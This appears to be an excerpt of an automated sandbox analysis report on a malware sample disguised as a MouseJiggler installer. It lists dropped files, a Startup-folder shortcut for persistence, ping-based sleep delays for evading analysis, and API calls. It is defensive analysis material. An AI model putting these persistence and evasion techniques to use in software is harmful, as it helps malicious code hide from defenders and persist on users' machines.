          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-CLKBK.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libid3tag.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-RC38A.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Local\Temp\is-280TB.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstsdp-1.0-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-SL01B.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-TILI0.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstriff-1.0-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile created: C:\Users\user\AppData\Local\Temp\genteert.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-AKVFR.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\7-zip.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-C2M67.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-LV053.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\Qt5QuickWidgets.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstfft-1.0-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libics3.0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-1HQQF.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-SQ21B.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-FE4PN.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-G9BN9.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-4V3H8.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libchromaprint.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-TNQQD.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-JAV07.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\UtilsLib.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile created: C:\Program Files (x86)\MouseJiggler\MouseJiggler.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\CommonManaged.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libmms-0.dll (copy)Jump to dropped file
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeFile created: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpJump to dropped file
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeFile created: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-A5HMB.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libmetis1-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-9DAD0.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libEGL.dll (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile created: C:\Users\user\AppData\Local\Temp\genteeDA\ssleay32.dllJump to dropped file
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile created: C:\Users\user\AppData\Local\Temp\genteeDA\libeay32.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-RM65K.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-TBC2F.tmpJump to dropped file
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile created: C:\Program Files (x86)\MouseJiggler\libupdate.exeJump to dropped file
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeFile created: C:\Users\user\AppData\Local\Temp\genteeDA\guig.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libplist.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\bzip2.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstcontroller-1.0-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\liborc-test-0.4-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TO2A4.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SQLite Distributed toolsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SQLite Distributed tools\SQLite Distributed tools.lnkJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sqlite_configurator.lnkJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sqlite_configurator.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,11_2_005C90B4
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,11_2_006A68B0
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,14_2_005C90B4
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,14_2_006A68B0
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Uses ping.exe to sleepShow sources
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1 Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 4860Thread sleep count: 66 > 30Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 6516Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 5372Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 6516Thread sleep time: -540000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 2532Thread sleep count: 211 > 30Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 2532Thread sleep time: -12660000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 1324Thread sleep count: 194 > 30Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 1324Thread sleep time: -11640000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 2268Thread sleep count: 54 > 30Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 5996Thread sleep count: 115 > 30Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 5996Thread sleep time: -6900000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 6648Thread sleep time: -38000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe TID: 5008Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeThread delayed: delay time: 180000
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-JGRD7.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-SQ21B.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libfaac.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-FE4PN.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgpg-error-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-G9BN9.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-INUKO.tmpJump to dropped file
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeDropped PE file which has not been started: C:\Program Files (x86)\MouseJiggler\uninstall.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libchromaprint.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-C5HIV.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-1TNCV.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\UtilsLib.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-TNQQD.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-JAV07.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-JNHV3.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\Qt5SerialPort.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\DevExpress.Sparkline.v14.2.Core.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstapp-1.0-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-CLKBK.tmpJump to dropped file
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeDropped PE file which has not been started: C:\Program Files (x86)\MouseJiggler\MouseJiggler.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libid3tag.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-RC38A.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\CommonManaged.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libmms-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-280TB.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-A5HMB.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-9DAD0.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstsdp-1.0-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libEGL.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-SL01B.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-TBC2F.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-RM65K.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-TILI0.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libplist.dll (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\genteeDA\guig.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\bzip2.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstcontroller-1.0-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstriff-1.0-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-AKVFR.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\7-zip.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-C2M67.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\liborc-test-0.4-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-LV053.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\Qt5QuickWidgets.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\libgstfft-1.0-0.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TO2A4.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-1HQQF.tmpJump to dropped file
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeThread delayed: delay time: 38000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeThread delayed: delay time: 38000
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeThread delayed: delay time: 180000
          Source: sqconfig.exe, 00000013.00000002.546360419.0000000003734000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,9_2_004AF91C
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeCode function: 0_2_100059A0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,0_2_100059A0
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0040AEF4 FindFirstFileW,FindClose,9_2_0040AEF4
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,9_2_0040A928
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_0060C2B0 FindFirstFileW,GetLastError,11_2_0060C2B0
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_0040E6A0 FindFirstFileW,FindClose,11_2_0040E6A0
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_0040E0D4
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,11_2_006B8DE4
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 12_2_0040AEF4 FindFirstFileW,FindClose,12_2_0040AEF4
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 12_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,12_2_0040A928
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_0060C2B0 FindFirstFileW,GetLastError,14_2_0060C2B0
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_0040E6A0 FindFirstFileW,FindClose,14_2_0040E6A0
